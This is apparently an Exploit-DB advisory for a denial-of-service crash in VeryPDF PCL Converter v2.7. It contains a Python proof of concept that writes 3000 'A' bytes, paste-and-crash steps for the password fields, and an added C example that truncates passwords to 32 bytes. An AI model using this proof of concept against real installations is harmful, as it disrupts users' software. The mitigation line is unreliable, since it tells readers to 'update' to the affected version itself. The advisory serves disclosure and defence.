Vendor: VeryPDF PCL Converter
By: Alejandra Sánchez
CVSS: 7.8 (HIGH)
Type: Denial of Service
CWE: N/A
Product Name: VeryPDF PCL Converter
Affected Version From: 2.7
Affected Version To: 2.7
Patch Exists: YES
Related CWE: N/A
CPE: a:verypdf:verypdf_pcl_converter
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2019

VeryPDF PCL Converter v2.7 – Denial of Service (PoC)

VeryPDF PCL Converter v2.7 is vulnerable to a denial of service when the contents of a maliciously crafted file are used as input. The Python script 'PCLConverter.py' creates a new file, 'PCLConverter.txt', containing 3000 'A' (0x41) characters. To trigger the crash, an attacker copies the text from the generated PCLConverter.txt file to the clipboard, opens VeryPDF PCL Converter v2.7, goes to 'Setting' > 'PDF Security', marks 'Encrypt PDF File', pastes the clipboard into the 'User Password' field or the 'Master Password' field, and clicks 'OK'. Finally, the attacker clicks 'Add File(s)', selects a PCL file (e.g. 'sample.pcl') and clicks 'Start', which causes a crash.

Mitigation:

Update to the latest version of VeryPDF PCL Converter v2.7
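
Added example (not VeryPDF's code and not part of the original advisory): a bounded way to turn the 'User Password' / 'Master Password' field into the fixed 32-byte form that the PDF standard security handler (revisions 2 to 4) works on, so a 3000-character value is truncated instead of copied whole. The page does not state the root cause of the crash; unbounded handling of the password field is an assumption, and `pdf_prepare_password` and `last_byte_for` are hypothetical names.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PDF_PW_LEN 32  /* password length used by the standard security handler */

/* Padding string the PDF specification defines for passwords under 32 bytes. */
static const uint8_t PDF_PAD[PDF_PW_LEN] = {
    0x28, 0xBF, 0x4E, 0x5E, 0x4E, 0x75, 0x8A, 0x41,
    0x64, 0x00, 0x4E, 0x56, 0xFF, 0xFA, 0x01, 0x08,
    0x2E, 0x2E, 0x00, 0xB6, 0xD0, 0x68, 0x3E, 0x80,
    0x2F, 0x0C, 0xA9, 0xFE, 0x64, 0x53, 0x69, 0x7A
};

/* Hypothetical helper: normalise a UI-supplied password to exactly 32 bytes.
 * Input of any length is accepted; only the first 32 bytes are ever copied.
 * Returns the number of input bytes used, or -1 on invalid arguments. */
int pdf_prepare_password(const char *in, size_t in_len, uint8_t out[PDF_PW_LEN])
{
    if (out == NULL || (in == NULL && in_len != 0))
        return -1;
    size_t used = in_len < PDF_PW_LEN ? in_len : PDF_PW_LEN;   /* truncate */
    if (used > 0)
        memcpy(out, in, used);
    if (used < PDF_PW_LEN)
        memcpy(out + used, PDF_PAD, PDF_PW_LEN - used);        /* pad */
    return (int)used;
}

/* Constructed sample input: n 'A' bytes, the same shape as PCLConverter.txt.
 * Returns the last byte of the normalised password, or -1 on failure. */
int last_byte_for(size_t n)
{
    static char field[3000];
    uint8_t out[PDF_PW_LEN];
    if (n > sizeof field)
        n = sizeof field;
    memset(field, 'A', n);
    if (pdf_prepare_password(field, n, out) < 0)
        return -1;
    return out[PDF_PW_LEN - 1];
}

int main(void)
{
    printf("3000-byte field -> last byte 0x%02X\n", (unsigned)last_byte_for(3000));
    printf("3-byte field    -> last byte 0x%02X\n", (unsigned)last_byte_for(3));
    return 0;
}
```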

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: VeryPDF PCL Converter v2.7 - Denial of Service (PoC)
# Date: 19/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.verypdf.com
# Software: http://www.verypdf.com/pcltools/pcl-converter.exe
# Version: 2.7
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "PCLConverter.py", it will create a new file "PCLConverter.txt"
# 2.- Copy the text from the generated PCLConverter.txt file to clipboard
# 3.- Open VeryPDF PCL Converter v2.7 
# 4.- Go to 'Setting' > 'PDF Security'
# 5.- Mark 'Encrypt PDF File' and paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'
# 6.- Click on 'Add File(s)', and select a pcl file, e.g. 'sample.pcl'
# 7.- Click on 'Start', you will see a crash

# 3000 'A' (0x41) characters, written to the file used in step 2
buffer = "\x41" * 3000
with open("PCLConverter.txt", "w") as f:
    f.write(buffer)